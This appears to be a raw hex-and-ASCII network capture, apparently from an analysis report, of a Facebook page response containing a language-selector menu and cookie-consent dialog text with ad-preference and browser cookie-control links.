                                                                                                                                  Data Ascii: 5Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogFooter.react":{"r":["vcBcJjw","\/HV4B4X","R5w1rCJ","PMEs\/oy","KAjbrl\/","hyKmpuu","o\/unyrn","uditdoq","Yv35Of2","sjCQeza","owesA3P"],"be":1},"XUIDialogTitle.react":{"r":["vcBcJjw","R5w1rCJ","ZEC4RrQ","EF1hWl5
                                                                                                                                  2022-10-17 20:07:22 UTC1538INData Raw: 6c 65 72 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 22 73 75 70 70 6f 72 74 73 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 22 3a 74 72 75 65 2c 22 64 65 66 61 75 6c 74 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 2d 77 68 65 6e 2d 63 72 6f 73 73 6f 72 69 67 69 6e 22 2c 22 73 77 69 74 63 68 65 64 5f 6d 65 74 61 5f 72 65 66 65 72 72 65 72 5f 70 6f 6c 69 63 79 22 3a 22 6f 72 69 67 69 6e 22 2c 22 6e 6f 6e 5f 6c 69 6e 6b 73 68 69 6d 5f 6c 6e 66 62 5f 6d 6f 64 65 22 3a 6e 75 6c 6c 2c 22 6c 69 6e 6b 5f 72 65 61 63 74 5f 64 65 66 61 75 6c 74 5f 68 61 73 68 22 3a 22 41 54 30 30 53 62 74 39 69 64 58 55 32 55 34 4d 58 41 52 6a 37 49 64 7a 31 62 64 68 4f 0d 0a 31 62 34 30 0d 0a 55 35 50 66 36 67 73 58 4f 35 4f 5f 62 4c 4a 4e 70 6d
                                                                                                                                  Data Ascii: lerConfig",[],{"supports_meta_referrer":true,"default_meta_referrer_policy":"origin-when-crossorigin","switched_meta_referrer_policy":"origin","non_linkshim_lnfb_mode":null,"link_react_default_hash":"AT00Sbt9idXU2U4MXARj7Idz1bdhO1b40U5Pf6gsXO5O_bLJNpm
                                                                                                                                  2022-10-17 20:07:22 UTC1540INData Raw: 30 37 39 5f 30 5f 39 5f 37 43 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 61 5f 50 47 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 62 5f 74 42 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 36 54 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 64 5f 39 68 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 65 5f 51 7a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 66 5f 68 4e 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 67 5f 4b 5a 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 68 5f 39 70 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 69 5f 50 4b 22 2c
                                                                                                                                  Data Ascii: 079_0_9_7C","__markup_3310c079_0_a_PG","__markup_3310c079_0_b_tB","__markup_3310c079_0_c_6T","__markup_3310c079_0_d_9h","__markup_3310c079_0_e_Qz","__markup_3310c079_0_f_hN","__markup_3310c079_0_g_KZ","__markup_3310c079_0_h_9p","__markup_3310c079_0_i_PK",
                                                                                                                                  2022-10-17 20:07:22 UTC1541INData Raw: 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 52 65 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 65 73 5f 4c 41 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 4b 31 22 7d 2c 22 6c 61
                                                                                                                                  Data Ascii: ctableItem"},"markup":{"__m":"__markup_3310c079_0_4_Re"},"label":"English (US)","title":"","className":"headerItem"},{"class":"headerItem","value":"es_LA","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_5_K1"},"la
                                                                                                                                  2022-10-17 20:07:22 UTC1543INData Raw: 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 6c 5f 50 4c 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 63 5f 36 54 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 50 6f 6c 73 6b 69 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 70 74 5f 42 52 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f
                                                                                                                                  Data Ascii: ,{"class":"headerItem","value":"pl_PL","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_c_6T"},"label":"Polski","title":"","className":"headerItem"},{"class":"headerItem","value":"pt_BR","selected":false,"ctor":{"_
                                                                                                                                  2022-10-17 20:07:22 UTC1544INData Raw: 5f 33 33 31 30 63 30 37 39 5f 30 5f 6a 5f 34 41 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 54 5c 75 30 30 66 63 72 6b 5c 75 30 30 65 37 65 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 63 73 5f 43 5a 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 6b 5f 4f 42 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 31 30 63 65 5c 75 30 31 36 31 74 69 6e 61 22 2c 22 74 69 74 6c 65 22 3a 22
                                                                                                                                  Data Ascii: _3310c079_0_j_4A"},"label":"T\u00fcrk\u00e7e","title":"","className":"headerItem"},{"class":"headerItem","value":"cs_CZ","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_k_OB"},"label":"\u010ce\u0161tina","title":"
                                                                                                                                  2022-10-17 20:07:22 UTC1545INData Raw: 32 61 35 30 0d 0a 4e 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f 5f 6d 22 3a 22 4d 65 6e 75 53 65 6c 65 63 74 61 62 6c 65 49 74 65 6d 22 7d 2c 22 6d 61 72 6b 75 70 22 3a 7b 22 5f 5f 6d 22 3a 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 70 5f 59 2b 22 7d 2c 22 6c 61 62 65 6c 22 3a 22 5c 75 30 39 33 39 5c 75 30 39 33 66 5c 75 30 39 32 38 5c 75 30 39 34 64 5c 75 30 39 32 36 5c 75 30 39 34 30 22 2c 22 74 69 74 6c 65 22 3a 22 22 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 7d 2c 7b 22 63 6c 61 73 73 22 3a 22 68 65 61 64 65 72 49 74 65 6d 22 2c 22 76 61 6c 75 65 22 3a 22 74 68 5f 54 48 22 2c 22 73 65 6c 65 63 74 65 64 22 3a 66 61 6c 73 65 2c 22 63 74 6f 72 22 3a 7b 22 5f
                                                                                                                                  Data Ascii: 2a50N","selected":false,"ctor":{"__m":"MenuSelectableItem"},"markup":{"__m":"__markup_3310c079_0_p_Y+"},"label":"\u0939\u093f\u0928\u094d\u0926\u0940","title":"","className":"headerItem"},{"class":"headerItem","value":"th_TH","selected":false,"ctor":{"_
                                                                                                                                  2022-10-17 20:07:22 UTC1547INData Raw: 43 6f 72 6e 65 72 22 7d 5d 2c 22 63 6c 61 73 73 4e 61 6d 65 22 3a 22 5f 35 37 64 69 22 2c 22 6d 61 78 68 65 69 67 68 74 22 3a 35 30 30 2c 22 74 68 65 6d 65 22 3a 7b 22 5f 5f 6d 22 3a 22 58 55 49 4d 65 6e 75 54 68 65 6d 65 22 7d 7d 5d 2c 33 5d 2c 5b 22 5f 5f 69 6e 73 74 5f 65 61 64 31 65 35 36 35 5f 30 5f 30 5f 64 70 22 2c 5b 22 44 69 61 6c 6f 67 58 22 2c 22 4c 61 79 65 72 46 61 64 65 4f 6e 48 69 64 65 22 2c 22 44 69 61 6c 6f 67 48 69 64 65 4f 6e 53 75 63 63 65 73 73 22 2c 22 4c 61 79 65 72 48 69 64 65 4f 6e 54 72 61 6e 73 69 74 69 6f 6e 22 2c 22 4c 61 79 65 72 52 65 6d 6f 76 65 4f 6e 48 69 64 65 22 2c 22 5f 5f 6d 61 72 6b 75 70 5f 39 66 35 66 61 63 31 35 5f 30 5f 30 5f 72 37 22 2c 22 48 54 4d 4c 22 5d 2c 5b 7b 22 77 69 64 74 68 22 3a 36 38 30 2c 22 61 75
                                                                                                                                  Data Ascii: Corner"}],"className":"_57di","maxheight":500,"theme":{"__m":"XUIMenuTheme"}}],3],["__inst_ead1e565_0_0_dp",["DialogX","LayerFadeOnHide","DialogHideOnSuccess","LayerHideOnTransition","LayerRemoveOnHide","__markup_9f5fac15_0_0_r7","HTML"],[{"width":680,"au
                                                                                                                                  2022-10-17 20:07:22 UTC1548INData Raw: 35 30 66 34 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 32 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6c 33 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 35 37 37 63 36 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 36 61 20 75 69 50 6f 70 6f 76 65 72 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 37 5f 32 38 5c 22 3e 5c 75 30 30 33 43 61 20 72 6f 6c 65 3d 5c 22 62 75 74 74 6f 6e 5c 22 20 63 6c 61 73 73 3d 5c 22 5f 34 32 66 74 20 5f 34 6a 79 30 20 5f 35 35 70 69 20 5f 32 61 67 66 20 5f 34 6f 5f 34 20 5f 39 6f 2d 65 20 5f 70 20 5f 34 6a 79 33 20 5f 35 31 37 68 20 5f 35 31 73 79 5c
                                                                                                                                  Data Ascii: 50f4\">\u003Cdiv class=\"_9xl2\">\u003Cdiv class=\"_9xl3\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_577c60\">\u003C\/i>\u003Cdiv class=\"_6a uiPopover\" id=\"u_0_7_28\">\u003Ca role=\"button\" class=\"_42ft _4jy0 _55pi _2agf _4o_4 _9o-e _p _4jy3 _517h _51sy\
                                                                                                                                  2022-10-17 20:07:22 UTC1550INData Raw: 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 46 6f 72 20 61 64 76 65 72 74 69 73 69 6e 67 20 61 6e 64 20 6d 65 61 73 75 72 65 6d 65 6e 74 20 73 65 72 76 69 63 65 73 20 6f 66 66 20 6f 66 20 46 61 63 65 62 6f 6f 6b 20 50 72 6f 64 75 63 74 73 2c 20 61 6e 61 6c 79 74 69 63 73 2c 20 61 6e 64 20 74 6f 20 70 72 6f 76 69 64 65 20 63 65 72 74 61 69 6e 20 66 65 61 74 75 72 65 73 20 61 6e 64 20 69 6d 70 72 6f 76 65 20 6f 75 72 20 73 65 72 76 69 63 65 73 20 66 6f 72 20 79 6f 75 2c 20 77 65 20 75 73 65 20 74 6f 6f 6c 73 20 66 72 6f 6d 20 6f 74 68 65 72 20 63 6f 6d 70 61 6e 69 65 73 20 6f 6e 20 46 61 63 65 62 6f 6f 6b 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65
                                                                                                                                  Data Ascii: _9xo0\">\u003C\/div>\u003Cdiv>\u003Cdiv>For advertising and measurement services off of Facebook Products, analytics, and to provide certain features and improve our services for you, we use tools from other companies on Facebook. These companies also use
                                                                                                                                  2022-10-17 20:07:22 UTC1551INData Raw: 65 73 20 66 6f 72 20 79 6f 75 2e 20 54 68 65 73 65 20 63 6f 6d 70 61 6e 69 65 73 20 61 6c 73 6f 20 75 73 65 20 63 6f 6f 6b 69 65 73 2e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 70 3e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 39 5f 56 4a 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e 67 65 5c 22 20 74 69 74 6c 65 3d 5c 22 65 78 70 61 6e 64 61 62 6c 65 20 73 65 63 74 69 6f 6e 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76
                                                                                                                                  Data Ascii: es for you. These companies also use cookies.\u003C\/div>\u003C\/div>\u003Cp>\u003C\/p>\u003Cdiv class=\"_9vtg\" id=\"u_0_9_VJ\">\u003Cbutton class=\"_9ngd _9nge\" title=\"expandable section\">\u003Cdiv class=\"_9ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv
                                                                                                                                  2022-10-17 20:07:22 UTC1553INData Raw: 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 78 6f 30 5c 22 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6b 5c 22 3e 4f 74 68 65 72 20 77 61 79 73 20 79 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 79 6f 75 72 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 76 74 67 5c 22 20 69 64 3d 5c 22 75 5f 30 5f 61 5f 6a 35 5c 22 3e 5c 75 30 30 33 43 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 64 20 5f 39 6e
                                                                                                                                  Data Ascii: \u003C\/div>\u003C\/div>\u003Cdiv class=\"_9xo0\">\u003C\/div>\u003C\/div>\u003Cdiv>\u003Cp class=\"_9o-k\">Other ways you can control your information\u003C\/p>\u003C\/div>\u003Cdiv>\u003Cdiv class=\"_9vtg\" id=\"u_0_a_j5\">\u003Cbutton class=\"_9ngd _9n
                                                                                                                                  2022-10-17 20:07:22 UTC1554INData Raw: 59 6f 75 20 63 61 6e 20 63 6f 6e 74 72 6f 6c 20 74 68 69 73 20 69 6e 20 79 6f 75 72 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 73 65 74 74 69 6e 67 73 5c 2f 61 64 73 5c 2f 5c 22 3e 61 64 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 61 3e 2e 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 73 69 2d 5c 22 3e 41 64 20 70 72 65 66 65 72 65 6e 63 65 73 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 75 73 65 20 79 6f 75 72 20 61 64 20 70 72 65 66 65 72 65 6e 63 65 73 20 74 6f 20 6c 65 61 72 6e 20 77 68 79 20 79 6f 75 26 23 30 33 39 3b 72 65 20 73 65 65 69
                                                                                                                                  Data Ascii: You can control this in your \u003Ca href=\"https:\/\/www.facebook.com\/settings\/ads\/\">ad settings\u003C\/a>.\u003C\/p>\u003Cp class=\"_9si-\">Ad preferences\u003C\/p>\u003Cp class=\"_9o-m\">You can use your ad preferences to learn why you&#039;re seei
                                                                                                                                  2022-10-17 20:07:22 UTC1556INData Raw: 75 74 74 6f 6e 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 62 20 5f 39 6e 67 61 5c 22 3e 5c 75 30 30 33 43 64 69 76 3e 5c 75 30 30 33 43 70 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6d 5c 22 3e 59 6f 75 20 63 61 6e 20 6f 70 74 20 6f 75 74 20 6f 66 20 73 65 65 69 6e 67 20 6f 6e 6c 69 6e 65 20 69 6e 74 65 72 65 73 74 2d 62 61 73 65 64 20 61 64 73 20 66 72 6f 6d 20 46 61 63 65 62 6f 6f 6b 20 61 6e 64 20 6f 74 68 65 72 20 70 61 72 74 69 63 69 70 61 74 69 6e 67 20 63 6f 6d 70 61 6e 69 65 73 20 74 68 72 6f 75 67 68 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c
                                                                                                                                  Data Ascii: utton>\u003Cdiv class=\"_9ngb _9nga\">\u003Cdiv>\u003Cp class=\"_9o-m\">You can opt out of seeing online interest-based ads from Facebook and other participating companies through the \u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\
                                                                                                                                  2022-10-17 20:07:22 UTC1556INData Raw: 33 32 37 37 0d 0a 4f 48 45 61 63 4f 78 72 47 69 49 51 4a 6e 52 78 42 63 44 4f 6e 41 55 44 31 4a 62 76 7a 66 50 52 73 54 5a 35 42 52 77 6d 78 6f 31 6f 34 38 65 54 6a 50 46 55 61 5f 68 64 5f 74 6a 4c 55 55 4f 59 47 48 6e 6c 6a 74 73 55 57 36 71 68 57 32 30 6b 46 73 34 51 68 63 54 33 38 6a 47 37 70 49 49 6a 2d 54 7a 30 63 6e 6b 70 63 4a 5f 73 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 44 69 67 69 74 61 6c 20 41 64 76 65 72 74 69 73 69 6e 67 20 41 6c 6c 69 61 6e 63 65 5c 75 30 30 33 43 5c 2f 61 3e 20 69 6e 20 74 68 65 20 55 53 2c 20 74 68 65 20 5c 75 30 30 33 43 61 20 68 72
                                                                                                                                  Data Ascii: 3277OHEacOxrGiIQJnRxBcDOnAUD1JbvzfPRsTZ5BRwmxo1o48eTjPFUa_hd_tjLUUOYGHnljtsUW6qhW20kFs4QhcT38jG7pIIj-Tz0cnkpcJ_sg\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asynclazy\">Digital Advertising Alliance\u003C\/a> in the US, the \u003Ca hr
                                                                                                                                  2022-10-17 20:07:22 UTC1557INData Raw: 20 6f 66 66 65 72 2c 20 79 6f 75 20 63 61 6e 20 72 65 76 69 65 77 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 72 65 73 6f 75 72 63 65 73 3a 5c 75 30 30 33 43 5c 2f 70 3e 5c 75 30 30 33 43 75 6c 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 71 5c 22 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 6f 70 74 6f 75 74 2e 61 62 6f 75 74 61 64 73 2e 69 6e 66 6f 5c 75 30 30 32 35 32 46 26 61 6d 70 3b 68 3d 41 54 32 70 39 68 48 63 5a 7a 74 64 7a 74 76 53 72 6a 6d 37 44 6b 57 6e 4a 7a 6e 59 6a 36 4f 6e 77 45 44 72 41 63 61 45 53 69 2d 39 58 47 65 4c 32 34 46
                                                                                                                                  Data Ascii: offer, you can review the following resources:\u003C\/p>\u003Cul class=\"_9o-q\">\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Foptout.aboutads.info\u00252F&amp;h=AT2p9hHcZztdztvSrjm7DkWnJznYj6OnwEDrAcaESi-9XGeL24F
                                                                                                                                  2022-10-17 20:07:22 UTC1559INData Raw: 6e 67 63 5c 22 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 66 5c 22 3e 5c 75 30 30 33 43 64 69 76 20 63 6c 61 73 73 3d 5c 22 5f 39 6f 2d 6c 5c 22 3e 43 6f 6e 74 72 6f 6c 6c 69 6e 67 20 63 6f 6f 6b 69 65 73 20 77 69 74 68 20 62 72 6f 77 73 65 72 20 73 65 74 74 69 6e 67 73 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 73 70 61 6e 20 63 6c 61 73 73 3d 5c 22 5f 39 6e 67 67 20 5f 39 76 37 76 5c 22 3e 5c 75 30 30 33 43 69 20 63 6c 61 73 73 3d 5c 22 69 6d 67 20 73 70 5f 51 76 36 44 33 48 54 65 5a 55 59 20 73 78 5f 33 61 36 38 31 38 5c 22 3e 5c 75 30 30 33 43 5c 2f 69 3e 5c 75 30 30 33 43 5c 2f 73 70 61 6e 3e 5c 75 30 30 33 43 5c 2f 64 69 76 3e 5c 75 30 30 33 43 5c 2f 62 75 74 74 6f 6e 3e
                                                                                                                                  Data Ascii: ngc\">\u003Cspan class=\"_9ngf\">\u003Cdiv class=\"_9o-l\">Controlling cookies with browser settings\u003C\/div>\u003C\/span>\u003Cspan class=\"_9ngg _9v7v\">\u003Ci class=\"img sp_Qv6D3HTeZUY sx_3a6818\">\u003C\/i>\u003C\/span>\u003C\/div>\u003C\/button>
                                                                                                                                  2022-10-17 20:07:22 UTC1560INData Raw: 6c 6f 72 65 72 2d 64 65 6c 65 74 65 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 26 61 6d 70 3b 68 3d 41 54 30 78 4d 44 6e 5f 6c 79 35 4a 75 4f 50 61 46 6b 49 61 73 30 50 67 34 52 49 4c 6c 4f 45 70 53 47 42 53 5a 77 6c 6f 48 54 78 4f 5a 42 5f 50 49 70 6c 4f 49 38 39 6c 6b 45 45 5a 78 65 4a 6b 6d 45 74 6a 42 75 44 65 77 7a 39 6e 55 4b 70 63 67 44 67 4d 47 46 77 4f 43 73 42 76 6a 73 39 4a 68 30 33 33 72 76 5a 30 4a 43 4d 4f 39 45 4a 63 37 70 46 55 44 72 49 67 32 59 67 6c 48 4e 35 49 74 46 6b 67 58 74 33 50 69 38 2d 6a 4e 38 77 4c 4c 72 6a 5f 4e 67 5c 22 20 74 61 72 67 65 74 3d 5c 22 5f 62 6c 61 6e 6b 5c 22 20 72 65 6c 3d 5c 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61
                                                                                                                                  Data Ascii: lorer-delete-manage-cookies&amp;h=AT0xMDn_ly5JuOPaFkIas0Pg4RILlOEpSGBSZwloHTxOZB_PIplOI89lkEEZxeJkmEtjBuDewz9nUKpcgDgMGFwOCsBvjs9Jh033rvZ0JCMO9EJc7pFUDrIg2YglHN5ItFkgXt3Pi8-jN8wLLrj_Ng\" target=\"_blank\" rel=\"noopener nofollow\" data-lynx-mode=\"asyncla
                                                                                                                                  2022-10-17 20:07:22 UTC1562INData Raw: 6e 6f 66 6f 6c 6c 6f 77 5c 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 5c 22 61 73 79 6e 63 6c 61 7a 79 5c 22 3e 53 61 66 61 72 69 20 4d 6f 62 69 6c 65 5c 75 30 30 33 43 5c 2f 61 3e 5c 75 30 30 33 43 5c 2f 6c 69 3e 5c 75 30 30 33 43 6c 69 3e 5c 75 30 30 33 43 61 20 68 72 65 66 3d 5c 22 68 74 74 70 73 3a 5c 2f 5c 2f 6c 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 6c 2e 70 68 70 3f 75 3d 68 74 74 70 73 5c 75 30 30 32 35 33 41 5c 75 30 30 32 35 32 46 5c 75 30 30 32 35 32 46 62 6c 6f 67 73 2e 6f 70 65 72 61 2e 63 6f 6d 5c 75 30 30 32 35 32 46 6e 65 77 73 5c 75 30 30 32 35 32 46 32 30 31 35 5c 75 30 30 32 35 32 46 30 38 5c 75 30 30 32 35 32 46 68 6f 77 2d 74 6f 2d 6d 61 6e 61 67 65 2d 63 6f 6f 6b 69 65 73 2d 69 6e 2d 6f 70 65 72 61 5c 75 30 30 32 35 32
                                                                                                                                  Data Ascii: nofollow\" data-lynx-mode=\"asynclazy\">Safari Mobile\u003C\/a>\u003C\/li>\u003Cli>\u003Ca href=\"https:\/\/l.facebook.com\/l.php?u=https\u00253A\u00252F\u00252Fblogs.opera.com\u00252Fnews\u00252F2015\u00252F08\u00252Fhow-to-manage-cookies-in-opera\u00252
                                                                                                                                  2022-10-17 20:07:22 UTC1563INData Raw: 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 34 5f 52 65 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 6e 67 6c 69 73 68 20 28 55 53 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 35 5f 4b 31 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 36 5f 78 36 22 2c 7b 22 5f 5f 68 74 6d 6c 22 3a 22 45 73 70 61 5c 75 30 30 66 31 6f 6c 20 28 45 73 70 61 5c 75 30 30 66 31 61 29 22 7d 2c 31 5d 2c 5b 22 5f 5f 6d 61 72 6b 75 70 5f 33 33 31 30 63 30 37 39 5f 30 5f 37 5f 49 53 22 2c 7b 22 5f 5f 